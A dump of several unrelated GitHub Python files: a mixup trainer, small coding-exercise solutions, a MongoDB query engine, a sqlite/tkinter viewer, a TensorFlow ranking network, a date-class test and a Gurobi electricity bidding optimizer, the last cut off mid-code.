cosine_annealing\n\n\ndef prepare_mixup(batch, alpha=1.0, use_cuda=True):\n \"\"\"Returns mixed inputs, pairs of targets, and lambda.\"\"\"\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = batch['data'].size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n return index, lam\n\n\ndef mixing(data, index, lam):\n return lam * data + (1 - lam) * data[index]\n\n\nclass MixupTrainer:\n def __init__(self, net: nn.Module, train_loader: DataLoader,\n config: Config) -> None:\n\n self.net = net\n self.train_loader = train_loader\n self.config = config\n self.alpha = self.config.trainer.trainer_args.alpha\n\n self.optimizer = torch.optim.SGD(\n net.parameters(),\n config.optimizer.lr,\n momentum=config.optimizer.momentum,\n weight_decay=config.optimizer.weight_decay,\n nesterov=True,\n )\n\n self.scheduler = torch.optim.lr_scheduler.LambdaLR(\n self.optimizer,\n lr_lambda=lambda step: cosine_annealing(\n step,\n config.optimizer.num_epochs * len(train_loader),\n 1,\n 1e-6 / config.optimizer.lr,\n ),\n )\n\n def train_epoch(self, epoch_idx):\n self.net.train()\n\n loss_avg = 0.0\n train_dataiter = iter(self.train_loader)\n\n for train_step in tqdm(range(1,\n len(train_dataiter) + 1),\n desc='Epoch {:03d}: '.format(epoch_idx),\n position=0,\n leave=True,\n disable=not comm.is_main_process()):\n batch = next(train_dataiter)\n\n # mixup operation\n index, lam = prepare_mixup(batch, self.alpha)\n data_mix = mixing(batch['data'].cuda(), index, lam)\n soft_label_mix = mixing(batch['soft_label'].cuda(), index, lam)\n\n # forward\n logits_classifier = self.net(data_mix)\n loss = soft_cross_entropy(logits_classifier, soft_label_mix)\n\n # backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n # exponential moving average, show smooth values\n with torch.no_grad():\n loss_avg = loss_avg * 0.8 + float(loss) * 0.2\n\n metrics = {}\n metrics['epoch_idx'] = epoch_idx\n metrics['loss'] = loss_avg\n\n return self.net, metrics\n","repo_name":"Jingkang50/OpenOOD","sub_path":"openood/trainers/mixup_trainer.py","file_name":"mixup_trainer.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":628,"dataset":"github-code","pt":"19"} +{"seq_id":"16624151939","text":"\"\"\"\nCreate a function that returns the sum of the two lowest positive numbers given an array of minimum 4 integers. No floats or empty arrays will be passed.\n\nFor example, when an array is passed like [19, 5, 42, 2, 77], the output should be 7.\n\n[10, 343445353, 3453445, 3453545353453] should return 3453455.\n\nHint: Do not modify the original array.\n\"\"\"\n\nclass Solution():\n def sum_two_smallest_numbers(self, numbers):\n numbers.sort()\n _len = len(numbers)\n i = 0\n while i < _len and numbers[i] < 1:\n i += 1\n\n if i < _len - 1:\n return numbers[i] + numbers[i + 1]\n\ndef main():\n print(Solution().sum_two_smallest_numbers([19, 5, 42, 2, 77])) # 7\n print(Solution().sum_two_smallest_numbers([-19, 5, 42, 2, 77])) # 7\n\n\nif __name__ == '__main__':\n main()","repo_name":"dbconfession78/interview_prep","sub_path":"code_wars/0001_sum_of_two_smallest_positive_integers.py","file_name":"0001_sum_of_two_smallest_positive_integers.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"30777901591","text":"\ntcases = int(input())\n\nfor x in range(tcases):\n #x starts fro 0 till tcases-1\n N = int(input())\n S = input() #len N --- SOlutions\n U = input() #len N 'N' if not answered the q, otherwise ans\n\n score = 0\n i=0\n while i<= N-1:\n if U[i] == 'N': #not answered see next one\n i+=1\n continue\n elif U[i] == S[i]: #correct answer\n score +=1\n i+=1\n continue\n elif U[i] != S[i]: #incorrect, skip next question\n i+=2\n\n print(score)\n\n\n","repo_name":"SankalppPanghal/Python","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30492702489","text":"from __future__ import annotations\n\nimport copy\nimport json\n\nfrom cachetools import TTLCache\nfrom pymongo.collection import Collection\nfrom pymongo.database import Database\n\nfrom argrelay.enum_desc.ReservedArgType import ReservedArgType\nfrom argrelay.misc_helper.ElapsedTime import ElapsedTime\nfrom argrelay.relay_server.QueryCacheConfig import QueryCacheConfig\nfrom argrelay.relay_server.QueryResult import QueryResult\nfrom argrelay.runtime_context.SearchControl import SearchControl\nfrom argrelay.runtime_data.AssignedValue import AssignedValue\nfrom argrelay.schema_config_core_server.StaticDataSchema import data_envelopes_\n\n\nclass QueryEngine:\n\n def __init__(\n self,\n query_cache_config: QueryCacheConfig,\n mongo_db: Database,\n ):\n self.mongo_db: Database = mongo_db\n self.mongo_col: Collection = self.mongo_db[data_envelopes_]\n self.query_cache: TTLCache = TTLCache(\n maxsize = query_cache_config.query_cache_max_size_bytes,\n ttl = query_cache_config.query_cache_ttl_sec,\n )\n self.enable_query_cache: bool = query_cache_config.enable_query_cache\n\n def query_data_envelopes(\n self,\n query_dict: dict,\n ) -> list[dict]:\n \"\"\"\n This query is used for `ServerAction.RelayLineArgs` with\n final invocation for vararg-like multiple `data_envelope`-s (FS_18_64_57_18).\n Therefore, it is not latency-sensitive (results are not cached).\n\n See also `QueryResult.data_envelopes`.\n \"\"\"\n\n query_res = self.mongo_col.find(query_dict)\n return list(iter(query_res))\n\n def query_prop_values(\n self,\n query_dict: dict,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Implements FS_39_58_01_91 query cache (if `enable_query_cache`).\n\n Returned `QueryResult` is used in for `ServerAction.ProposeArgValues` (Tab-completion)\n which makes it latency-sensitive (so the result is cached - see FS_39_58_01_91).\n\n Unlike `QueryEngine.query_data_envelopes` which returns all `data_envelopes` directly,\n `QueryEngine.query_prop_values` populates 0 to 1 envelope only (for performance reasons).\n\n See also `QueryResult.query_data_envelopes` and `QueryResult.data_envelopes`\n \"\"\"\n\n if self.enable_query_cache:\n ElapsedTime.measure(\"before_cache_lookup\")\n query_key = json.dumps(query_dict, separators = (\",\", \":\"))\n query_result = self.query_cache.get(query_key)\n ElapsedTime.measure(\"after_cache_lookup\")\n if query_result:\n return copy.deepcopy(query_result)\n\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n\n self.query_cache[query_key] = copy.deepcopy(query_result)\n else:\n query_result = self._query_prop_values(\n assigned_types_to_values,\n query_dict,\n search_control,\n )\n # No cache -> no deep copy (throw away result):\n return query_result\n\n def _query_prop_values(\n self,\n assigned_types_to_values,\n query_dict,\n search_control,\n ) -> QueryResult:\n\n ElapsedTime.measure(\"before_mongo_find\")\n mongo_result = self.mongo_col.find(query_dict)\n ElapsedTime.measure(\"after_mongo_find\")\n query_result = self._process_prop_values(\n mongo_result,\n search_control,\n assigned_types_to_values,\n )\n ElapsedTime.measure(\"after_process_results\")\n return query_result\n\n @staticmethod\n def _process_prop_values(\n mongo_result,\n search_control: SearchControl,\n assigned_types_to_values: dict[str, AssignedValue],\n ) -> QueryResult:\n \"\"\"\n Process `mongo_result` per types in `search_control` and populates `remaining_types_to_values`.\n\n It combines in one loop:\n * counting total `found_count` of `data_envelope`-s returned and\n * storing the last `data_envelope`.\n The last `data_envelope` is only useful when `found_count` is one (making it unambiguous `data_envelope`).\n To search all `data_envelope`, use `query_data_envelopes` function.\n\n Populates:\n * `found_count`\n * `remaining_types_to_values`\n \"\"\"\n\n remaining_types_to_values: dict[str, list[str]] = {}\n data_envelope = None\n data_envelopes = []\n found_count = 0\n\n # TODO: What if search result is huge? Blame data set designer?\n # find all remaining arg vals per arg type:\n for data_envelope in iter(mongo_result):\n found_count += 1\n # `arg_type` must be known:\n for arg_type in search_control.types_to_keys_dict:\n # `arg_type` must be in one of the `data_envelope`-s found:\n if arg_type in data_envelope:\n # If assigned/consumed, `arg_type` must not appear\n # as an option in `remaining_types_to_values` again:\n if arg_type not in assigned_types_to_values:\n arg_vals = scalar_to_list_values(data_envelope[arg_type])\n\n val_list = remaining_types_to_values.setdefault(arg_type, [])\n\n # Deduplicate: ensure unique `arg_value`-s:\n for arg_val in arg_vals:\n if arg_val not in val_list:\n val_list.append(arg_val)\n\n # Populate max one `data_envelope` on prop query for performance reasons:\n if data_envelope is not None:\n data_envelopes.append(data_envelope)\n\n return QueryResult(\n data_envelopes,\n found_count,\n remaining_types_to_values,\n )\n\n\ndef scalar_to_list_values(arg_type_val: list | str) -> list[str]:\n \"\"\"\n FS_06_99_43_60 providing scalar value for list/array field is also possible (and vice versa).\n \"\"\"\n if not isinstance(arg_type_val, list):\n return [arg_type_val]\n else:\n return arg_type_val\n\n\ndef populate_query_dict(envelope_container):\n query_dict = {\n ReservedArgType.EnvelopeClass.name: envelope_container.search_control.envelope_class,\n }\n # FS_31_70_49_15: populate arg values to search from the context:\n for arg_type in envelope_container.search_control.types_to_keys_dict:\n if arg_type in envelope_container.assigned_types_to_values:\n query_dict[arg_type] = envelope_container.assigned_types_to_values[arg_type].arg_value\n return query_dict\n","repo_name":"argrelay/argrelay","sub_path":"src/argrelay/relay_server/QueryEngine.py","file_name":"QueryEngine.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"45605049858","text":"import sqlite3\nimport tkinter as tk \nfrom tkinter import * \n \ncon = sqlite3.connect('Form.db')\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM StudentDetails')\n rows = cursorObj.fetchall()\n for row in rows:\n print(row, end=\"\\n\")\nsql_fetch(con)\n\nprint(end=\"\\n\\n\")\n\ndef sql_fetch(con):\n cursorObj = con.cursor()\n cursorObj.execute('SELECT name from sqlite_master where type= \"table\"')\n print(cursorObj.fetchall()) \nsql_fetch(con)\n\ncursorObj = con.cursor()\nprint(cursorObj.execute('SELECT * FROM StudentDetails').rowcount)\n\nprint(end=\"\\n\\n\")\n\nwin = tk.Tk()\nwin.geometry(\"815x250\")\nwin.configure(bg='black')\nwin.title(\"Database of Student Details\")\n\nlabel_0 = Label(win, text=\"Student Details Table\",bg='black', fg='white', width=20,font=(\"bold\", 30))\nlabel_0.place(x=200, y=70)\n\nprint(end=\"\\n\\n\")\n\nmy_connect = sqlite3.connect('Form.db')\nmy_conn = my_connect.cursor()\n\nmy_conn.execute(\"SELECT * FROM StudentDetails\")\ni=0 \nfor StudentDetails in my_conn: \n for j in range(len(StudentDetails)):\n e = Entry(win, width=10, bg='black', fg='white') \n e.grid(row=i, column=j) \n e.insert(END, StudentDetails[j])\n i=i+1\nwin.mainloop()\n","repo_name":"kanch91/Python-Project","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2162077094","text":"import tensorflow as tf\n\nlayers = tf.keras.layers\n\n\nclass EvaluateNetwork(tf.keras.Model):\n def __init__(self):\n super().__init__()\n self.conv2d_1 = layers.Conv2D(filters=32, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_1 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.conv2d_2 = layers.Conv2D(filters=64, kernel_size=5,\n padding='same', activation='relu')\n\n self.pool2d_2 = layers.MaxPool2D(pool_size=2, strides=2)\n\n self.flatten = layers.Flatten()\n\n self.dense_1 = layers.Dense(units=1024, activation='relu')\n\n self.dropout = layers.Dropout(rate=0.5)\n\n self.dense_2 = layers.Dense(units=1)\n\n def call(self, inputs, training=False):\n x = self.conv2d_1(inputs)\n x = self.pool2d_1(x)\n x = self.conv2d_2(x)\n x = self.pool2d_2(x)\n x = self.flatten(x)\n x = self.dense_1(x)\n if training:\n x = self.dropout(x, training)\n return self.dense_2(x)\n\n\nif __name__ == \"__main__\":\n net = EvaluateNetwork()\n\n input_shape = (32, 32, 3)\n\n left_input = tf.keras.Input(shape=input_shape)\n right_input = tf.keras.Input(shape=input_shape)\n\n x = net(left_input)\n y = net(right_input)\n\n combined = tf.keras.Model(inputs=[left_input, right_input], outputs=[x, y])\n combined.summary()\n","repo_name":"purin52002/GenerateImageFromUserPreference","sub_path":"ranknet/model/evaluate_network.py","file_name":"evaluate_network.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9177462525","text":"lst = list(map(int,input().split()))\nN = len(lst)\nhalf = N//2\nif(N==3 and half == 1): #for cases where length of the list is 3 and we have a value repeating twice\n half =2\n\nfor i in range(N):\n count = 0\n x = lst[i]\n for j in range(i,N):\n if(lst[j] == x):\n count +=1\n \n if(count>=half):\n print(lst[i])\n \n\n\n","repo_name":"tg270798/daily-coding-problem","sub_path":"problem_155.py","file_name":"problem_155.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26875615602","text":"\n\nfrom turtle import pos\n\n\ndef search(list,n):\n l = 0 #l mean lower bound and it is first index of the list\n u = len(list)-1 #u mean upper bound and it is last index value of list\n while l <= u :\n mid = (l+u)//2 # \"//\" give output to int\n if list[mid] == n:\n globals() ['pos'] = mid \n return True\n else:\n if list[mid] < n:\n l = mid\n else:\n u = mid\n\nlist = [4,7,8,12,45,99]\nn = 45\nif search( list,n ):\n print(\"found at \",pos+1)\nelse:\n print(\"not found\")\n","repo_name":"aungkyaw718/alogrithm","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40950002089","text":"from dato import Dato\n\ndef hovedprogram():\n \"\"\"Hovedprogrammet sjekker at klassen Dato fungerer som den skal\"\"\"\n\n # Oppretter et Dato objekt\n min_bursdag = Dato(31, 12, 2004)\n\n # Printer ut året\n print(min_bursdag.hent_aar())\n\n # Lagrer datoen i en variabel og deler den i en liste\n dato = min_bursdag.hent_dato()\n dato_sortert = dato.split(\".\")\n\n # Sjekker om dagen er den 15. i måneden\n if dato_sortert[0] == \"15\":\n print(\"Loenningsdag!\")\n # Sjekker om dagen er den 1. i måneden\n elif dato_sortert[0] == \"1\":\n print(\"Ny maaned, nye muligheter\")\n \n # Printer ut datoen\n print(dato)\n \n # Sjekker om datoen er den 31.\n if min_bursdag.sjekk_dag(31):\n print(\"Dagen stemmer\")\n else:\n print(\"Dagen stemmer ikke\")\n \n # Kaller på neste_dag() metoden for å endre datoen til neste dag\n min_bursdag.neste_dag()\n # Printer ut den nye datoen\n print(min_bursdag.hent_dato())\n\n # Lagrer True hvis datoen oppgitt er etter datoen fra konstruktøren, og False hvis den er før\n dato_for_etter = min_bursdag.for_eller_etter(\"1.1.2004\")\n \n if dato_for_etter == 0:\n print(\"Datoene er like\")\n elif dato_for_etter == 1:\n print(\"Datoen er før\")\n else:\n print(\"Datoen er etter\")\n\n# Kaller på hovedprogrammet\nhovedprogram()","repo_name":"Sondremi/IN1000-obliger-H23","sub_path":"Oblig6/test_dato.py","file_name":"test_dato.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9185301177","text":"# -*- coding: UTF-8 -*-\n\nimport math\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nclass Planner():\n \"\"\"\n MILP Electricity dad bidding formulation.\n \"\"\"\n\n def __init__(self, scenarios:dict, prices:dict, x:np.array=None, curtail:bool=True, soc_max:float=1):\n \"\"\"\n Init the planner.\n \"\"\"\n\n self.pv_scenarios = scenarios['PV'] # (MW) (n_s, n_periods)\n self.wind_scenarios = scenarios['W'] # (MW) (n_s, n_periods)\n self.load_scenarios = scenarios['L'] # (MW) (n_s, n_periods)\n self.nb_scenarios = self.pv_scenarios.shape[0]\n self.s_set = range(self.nb_scenarios)\n self.x = x # (MW)\n self.curtail = curtail\n\n self.period_hours = 1 # (hour)\n self.nb_periods = self.pv_scenarios.shape[1]\n self.t_set = range(self.nb_periods)\n\n self.dad_prices = prices['dad'] # (euros/MWh) (n_periods,)\n self.imb_pos_prices = prices['imb +'] # (euros/MWh) (n_periods,)\n self.imb_neg_prices = prices['imb -'] # (euros/MWh) (n_periods,)\n\n # BESS parameters\n self.soc_max = soc_max\n self.charge_power = self.soc_max / 2\n self.discharge_power = self.soc_max / 2\n self.soc_min = 0\n self.charge_eff = 0.95\n self.discharge_eff = 0.95\n self.soc_ini = 0\n self.soc_end = 0\n\n self.time_building_model = None\n self.time_solving_model = None\n\n # Create model\n self.model = self.create_model()\n\n # Solve model\n self.solver_status = None\n\n def create_model(self):\n \"\"\"\n Create the optimization problem.\n \"\"\"\n t_build = time.time()\n\n # -------------------------------------------------------------------------------------------------------------\n # 1. create model\n model = gp.Model(\"planner_dad\")\n\n # -------------------------------------------------------------------------------------------------------------\n # 2. create variables\n # 2.1 First-stage variables -> x = dad bidding\n x = model.addVars(self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"x\") # Retailer position (injection > 0, withdrawal < 0) (MWh)\n if self.x is not None:\n for t in self.t_set:\n x[t].setAttr(\"ub\", self.x[t])\n x[t].setAttr(\"lb\", self.x[t])\n\n # 2.2 Second-stage variables -> y = realisation of the random variables in scenarios omega\n y = model.addVars(self.nb_scenarios, self.nb_periods, lb=-1000, ub=1000, obj=0, vtype=GRB.CONTINUOUS, name=\"y\") # Retailer position in scenario s (injection > 0, withdrawal < 0) (MWh)\n y_short = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_short\") # Retailer position in short in scenario s y_short >= (x - y) (MWh)\n y_long = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_long\") # Retailer position in long in scenario s y_long >= (y - x) (MWh)\n\n y_PV = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_PV\") # PV generation in scenario s (MW)\n y_W = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_W\") # Wind generation in scenario s (MW)\n y_L = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_L\") # Load generation in scenario s (MW)\n\n y_s = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_s\") # BESS state of charge in scenario s (MWh)\n y_cha = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_cha\") # BESS charging power in scenario s (MW)\n y_dis = model.addVars(self.nb_scenarios, self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name=\"y_dis\") # BESS discharging power in scenario s (MW)\n y_b = model.addVars(self.nb_scenarios, self.nb_periods, obj=0, vtype=GRB.BINARY, name=\"y_b\") # BESS binary variable to prevent from charging or discharging simultaneously in scenario s (-)\n\n # -------------------------------------------------------------------------------------------------------------\n # 3. Objective: maximize the IJF_paper profit\n # -------------------------------------------------------------------------------------------------------------\n # Maximization of the expected profit over all scenarios s with an equal probability\n # -> the dad prices are assumed to be equal to the expected value for a given time periocd t: dad_prices_t = E[dad_prices_{t,s}]\n # -> the pos imb prices are assumed to be equal to the expected value: imb_pos_prices_t = E[imb_pos_prices_{t,s}]\n # -> the neg imb prices are assumed to be equal to the expected value: imb_neg_prices_t = E[imb_neg_prices_{t,s}]\n\n # max sum_t [sum_s alpha_s {self.dad_prices[t] * y[s,t] -(self.imb_neg_prices[t] * y_short[s,t] + self.imb_pos_prices[t] * y_long[s,t]) }]\n\n dad_profit = gp.quicksum(self.dad_prices[t] * x[t] for t in self.t_set)\n short_penalty = gp.quicksum(gp.quicksum(self.imb_neg_prices[t] * y_short[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n long_penalty = gp.quicksum(gp.quicksum(self.imb_pos_prices[t] * y_long[s,t] for s in self.s_set)/self.nb_scenarios for t in self.t_set)\n\n model.setObjective(dad_profit - (short_penalty + long_penalty), GRB.MAXIMIZE)\n\n # -------------------------------------------------------------------------------------------------------------\n # 4. create constraints\n\n # Second-stage constraints\n # Energy balance equation\n model.addConstrs((y[s,t] - self.period_hours * (y_PV[s,t] + y_W[s,t] + y_dis[s,t] - y_cha[s,t]) + y_L[s,t] == 0 for s in self.s_set for t in self.t_set), name='c_balance')\n\n # Short position cst\n model.addConstrs((y_short[s,t] >= (x[t] - y[s,t]) for s in self.s_set for t in self.t_set), name='c_short')\n # Long position cst\n model.addConstrs((y_long[s,t] >= (y[s,t] - x[t]) for s in self.s_set for t in self.t_set), name='c_long')\n\n # Generation & load cst\n if self.curtail:\n model.addConstrs((y_PV[s,t] <= self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] <= self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n else:\n model.addConstrs((y_PV[s,t] == self.pv_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_PV')\n model.addConstrs((y_W[s,t] == self.wind_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_W')\n model.addConstrs((y_L[s,t] == self.load_scenarios[s,t] for s in self.s_set for t in self.t_set), name='c_L')\n\n # BESS constraints\n # max charge cst\n model.addConstrs((y_cha[s,t] <= y_b[s,t] * self.charge_power for s in self.s_set for t in self.t_set), name='c_max_charge')\n # max discharge cst\n model.addConstrs((y_dis[s,t] <= (1 - y_b[s,t]) * self.discharge_power for s in self.s_set for t in self.t_set), name='c_max_discharge')\n # min soc cst\n model.addConstrs((y_s[s,t] >= self.soc_min for s in self.s_set for t in self.t_set), name='c_min_s')\n # min soc cst\n model.addConstrs((y_s[s,t] <= self.soc_max for s in self.s_set for t in self.t_set), name='c_max_s')\n\n # BESS dynamics first period\n model.addConstrs((y_s[s,0] - self.period_hours * (self.charge_eff * y_cha[s,0] - y_dis[s,0] / self.discharge_eff) == self.soc_ini for s in self.s_set), name='c_BESS_first_period')\n # BESS dynamics from second to last periods\n model.addConstrs((y_s[s,t] - y_s[s,t-1]- self.period_hours * (self.charge_eff * y_cha[s,t] - y_dis[s,t] / self.discharge_eff) == 0 for s in self.s_set for t in range(1, self.nb_periods)), name='c_BESS_dynamics')\n # BESS dynamics last period\n model.addConstrs((y_s[s, self.nb_periods-1] == self.soc_end for s in self.s_set), name='c_BESS_last_period')\n\n # -------------------------------------------------------------------------------------------------------------\n # 5. Store variables\n self.allvar = dict()\n self.allvar['x'] = x\n self.allvar['y'] = y\n self.allvar['y_short'] = y_short\n self.allvar['y_long'] = y_long\n self.allvar['y_PV'] = y_PV\n self.allvar['y_W'] = y_W\n self.allvar['y_L'] = y_L\n self.allvar['y_cha'] = y_cha\n self.allvar['y_dis'] = y_dis\n self.allvar['y_s'] = y_s\n self.allvar['y_b'] = y_b\n\n self.time_building_model = time.time() - t_build\n # print(\"Time spent building the mathematical program: %gs\" % self.time_building_model)\n\n return model\n\n def solve(self, LogToConsole:bool=False, logfile:str=\"\", Threads:int=0, MIPFocus:int=0, TimeLimit:float=GRB.INFINITY):\n\n t_solve = time.time()\n\n self.model.setParam('LogToConsole', LogToConsole) # no log in the console if set to False\n # self.model.setParam('OutputFlag', outputflag) # no log into console and log file if set to True\n # self.model.setParam('MIPGap', 0.01)\n self.model.setParam('TimeLimit', TimeLimit)\n self.model.setParam('MIPFocus', MIPFocus)\n # self.model.setParam('DualReductions', 0) # Model was proven to be either infeasible or unbounded. To obtain a more definitive conclusion, set the DualReductions parameter to 0 and reoptimize.\n\n # If you are more interested in good quality feasible solutions, you can select MIPFocus=1.\n # If you believe the solver is having no trouble finding the optimal solution, and wish to focus more attention on proving optimality, select MIPFocus=2.\n # If the best objective bound is moving very slowly (or not at all), you may want to try MIPFocus=3 to focus on the bound.\n\n self.model.setParam('LogFile', logfile) # no log in file if set to \"\"\n self.model.setParam('Threads', Threads) # Default value = 0 -> use all threads\n\n self.model.optimize()\n self.solver_status = self.model.status\n self.time_solving_model = time.time() - t_solve\n\n def store_solution(self):\n\n m = self.model\n\n solution = dict()\n solution['status'] = m.status\n if solution['status'] == 2 or solution['status'] == 9:\n solution['obj'] = m.objVal\n\n # 1 dimensional variables\n for var in ['x']:\n solution[var] = [self.allvar[var][t].X for t in self.t_set]\n\n # 2 dimensional variables\n for var in ['y', 'y_short', 'y_long', 'y_PV', 'y_W', 'y_L', 'y_dis', 'y_cha', 'y_s', 'y_b']:\n solution[var] = [[self.allvar[var][s, t].X for t in self.t_set] for s in self.s_set]\n\n solution['dad_profit'] = sum([solution['x'][t] * self.dad_prices[t] for t in self.t_set])\n solution['short_penalty'] = sum([sum([solution['y_short'][s][t] * self.imb_neg_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['long_penalty'] = sum([sum([solution['y_long'][s][t] * self.imb_pos_prices[t] for t in self.t_set]) for s in self.s_set]) / self.nb_scenarios\n solution['obj2'] = solution['dad_profit'] - (solution['short_penalty'] + solution['long_penalty'])\n else:\n print('WARNING model is not OPTIMAL')\n solution['obj'] = math.nan\n\n # 3. Timing indicators\n solution[\"time_building\"] = self.time_building_model\n solution[\"time_solving\"] = self.time_solving_model\n solution[\"time_total\"] = self.time_building_model + self.time_solving_model\n\n return solution\n\n def export_model(self, filename):\n \"\"\"\n Export the pyomo model into a cpxlp format.\n :param filename: directory and filename of the exported model.\n \"\"\"\n\n self.model.write(\"%s.lp\" % filename)\n # self.model.write(\"%s.mps\" % filename)\n\n\nif __name__ == \"__main__\":\n # Set the working directory to the root of the project\n print(os.getcwd())\n\n dir_path = '../../../elia_case_study/bidding/export/dad_bidding/'\n if not os.path.isdir(dir_path): # test if directory exist\n os.makedirs(dir_path)\n\n soc_max = 500\n\n q_pos = 2\n q_neg = 2\n\n dad_price = 100 # euros /MWh\n # pos_imb = neg_imb = q * dad_price # euros /MWh\n pos_imb = q_pos * dad_price # euros /MWh\n neg_imb = q_neg * dad_price # euros /MWh\n gamma = (dad_price + pos_imb) / (pos_imb + neg_imb)\n print('dad_price %s pos_imb %s neg_imb %s GAMMA %s' % (dad_price, pos_imb, neg_imb, gamma))\n\n # load data\n df_gen = pd.read_csv('../../../elia_case_study/data/generation.csv', parse_dates=True, index_col=0)\n df_load = pd.read_csv('../../../elia_case_study/data/load.csv', parse_dates=True, index_col=0)\n df_dad = pd.read_csv('../../../elia_case_study/data/dad.csv', parse_dates=True, index_col=0)\n df_imb = pd.read_csv('../../../elia_case_study/data/imb.csv', parse_dates=True, index_col=0)\n\n nb_scenarios = 5\n pv = df_gen['PV true']['2020-1-1':'2020-1-'+str(nb_scenarios)]\n wind = df_gen['W on true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n load = 0.05 * df_load['load true']['2020-1-1':'2020-1-' + str(nb_scenarios)]\n\n # 20 scenarios\n scenarios = dict()\n scenarios['PV'] = pv.values.reshape(nb_scenarios,24)\n scenarios['W'] = wind.values.reshape(nb_scenarios, 24)\n scenarios['L'] = load.values.reshape(nb_scenarios, 24)\n\n # Plot point forecasts vs observations\n FONTSIZE = 10\n plt.figure()\n net = pv.values + wind.values - load.values\n plt.plot(pv.values, label='PV')\n plt.plot(wind.values, label='W on')\n plt.plot(load.values, label='Load')\n plt.plot(net, 'r', label='net')\n plt.ylabel('MW', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n prices = dict()\n prices['dad'] = np.asarray([dad_price]*16+[3*dad_price]*4+[dad_price]*4)\n prices['imb +'] = np.asarray([pos_imb]*16+[3*pos_imb]*4+[pos_imb]*4)\n prices['imb -'] = np.asarray([neg_imb]*16+[3*neg_imb]*4+[neg_imb]*4)\n\n # prices = dict()\n # prices['dad'] = df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb +'] = q_pos * df_dad['2020-1-3'].values.reshape(-1)\n # prices['imb -'] = q_neg * df_dad['2020-1-3'].values.reshape(-1)\n\n plt.figure()\n plt.plot(prices['dad'], label='dad')\n plt.plot(prices['imb -'] , label='imb neg')\n plt.ylabel('€/MWh', fontsize=FONTSIZE, rotation='horizontal')\n plt.xticks(fontsize=FONTSIZE)\n plt.yticks(fontsize=FONTSIZE)\n plt.legend(fontsize=FONTSIZE)\n plt.tight_layout()\n plt.show()\n\n # Dad planner\n planner = Planner(scenarios=scenarios, prices=prices, soc_max=soc_max)\n planner.export_model(dir_path + 'planner_dad')\n planner.solve()\n sol_planner = planner.store_solution()\n #\n print('profit %.2f k€ dad bid %.2f short penalty %.2f k€ long penalty %.2f k€' % (sol_planner['obj'] / 1000, sol_planner['dad_profit'] / 1000, sol_planner['short_penalty'] / 1000, sol_planner['long_penalty'] / 1000))\n\n plt.figure()\n plt.plot(sol_planner['x'], 'r', label='planning')\n for s in range(nb_scenarios):\n # plt.plot(solution['y'][0], 'k',label='position')\n net = scenarios['PV'][s] + scenarios['W'][s] - scenarios['L'][s]\n # 